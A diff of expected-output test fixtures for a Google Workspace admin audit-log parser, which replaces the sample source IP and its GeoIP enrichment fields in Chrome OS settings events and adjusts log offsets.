+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_ANDROID_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"2345\"},{\"name\":\"CHROME_OS_SESSION_TYPE\",\"value\":\"type\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -32,23 +32,19 @@
         "log.offset": 0,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -69,7 +65,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_DEVICE_STATE\",\"parameters\":[{\"name\":\"DEVICE_NEW_STATE\",\"value\":\"new\"},{\"name\":\"DEVICE_PREVIOUS_STATE\",\"value\":\"prev\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_DEVICE_STATE\",\"parameters\":[{\"name\":\"DEVICE_NEW_STATE\",\"value\":\"new\"},{\"name\":\"DEVICE_PREVIOUS_STATE\",\"value\":\"prev\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -84,26 +80,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 648,
+        "log.offset": 647,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -125,7 +117,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"2345\"},{\"name\":\"CHROME_OS_SESSION_TYPE\",\"value\":\"type\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"2345\"},{\"name\":\"CHROME_OS_SESSION_TYPE\",\"value\":\"type\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -145,26 +137,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 1162,
+        "log.offset": 1160,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -185,7 +173,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"SEND_CHROME_OS_DEVICE_COMMAND\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"2345\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"SEND_CHROME_OS_DEVICE_COMMAND\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"2345\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -198,26 +186,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 1802,
+        "log.offset": 1799,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -238,7 +222,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_ANNOTATION\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"2345\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_ANNOTATION\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"2345\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -250,26 +234,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2233,
+        "log.offset": 2229,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -291,7 +271,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -306,26 +286,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2634,
+        "log.offset": 2629,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -346,7 +322,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_STATE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_DEVICE_STATE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -361,26 +337,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 3136,
+        "log.offset": 3130,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -402,7 +374,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_PUBLIC_SESSION_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_PUBLIC_SESSION_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -417,26 +389,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 3641,
+        "log.offset": 3634,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -457,7 +425,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"INSERT_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"INSERT_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation"
@@ -469,26 +437,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 4151,
+        "log.offset": 4143,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -509,7 +473,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"DELETE_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"DELETE_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "deletion"
@@ -521,26 +485,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 4546,
+        "log.offset": 4537,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -561,7 +521,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_CHROME_OS_PRINT_SERVER\",\"parameters\":[{\"name\":\"PRINT_SERVER_NAME\",\"value\":\"server\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -575,26 +535,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 4941,
+        "log.offset": 4931,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -615,7 +571,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"INSERT_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"}]}}",
